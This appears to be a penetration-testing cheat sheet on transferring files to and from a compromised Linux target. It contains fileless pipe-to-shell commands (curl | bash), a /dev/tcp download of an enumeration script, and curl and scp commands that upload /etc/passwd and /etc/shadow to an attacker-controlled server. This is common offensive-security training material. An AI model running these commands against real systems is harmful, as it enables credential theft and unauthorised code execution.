Linux Target
Download Operations (Attacker -> Target)
Base64 Encoding and Decoding
If you have access toa terminal on the target, you can just paste base64 into it and decode it
Web Downloads with Wget and cURL
wget <URL> -O <PATH_OUTPUT>
curl -o <PATH_OUTPUT> <URL>
Fileless
Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.
Fileless Download with cURL
curl <URL> | bash
wget -qO- <URL> | python3
Download with Bash (/dev/tcp)
There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/TCP device file can be used for simple file downloads.
exec 3<>/dev/tcp/10.10.10.32/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
cat <&3
SSH Downloads
On the Attacker machine install and/or enable SSH
sudo systemctl enable ssh
sudo systemctl start ssh
On the Target machine:
scp [email protected]:/root/myroot.txt .
Upload Operations (Target -> Attacker)
Web Upload
Same method as in Windows by creating an http server that allows uploads:
sudo python3 -m pip install --user uploadserver
we can add to it a self-signed certificate:
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
(The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver)
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
Finally let's upload multiple files in one request, from the Target machine run:
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
We used the option --insecure
because we used a self-signed certificate that we trust.
Alternative Web File Transfer Method
Since Linux distributions usually have Python
or php
installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page, which means that we are downloading the file from our Pwnbox.
python3 -m http.server
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000
Then download the file normally from the Attacker machine
SCP Upload
scp /etc/passwd <username>@<IP>:/home/kali/
Last updated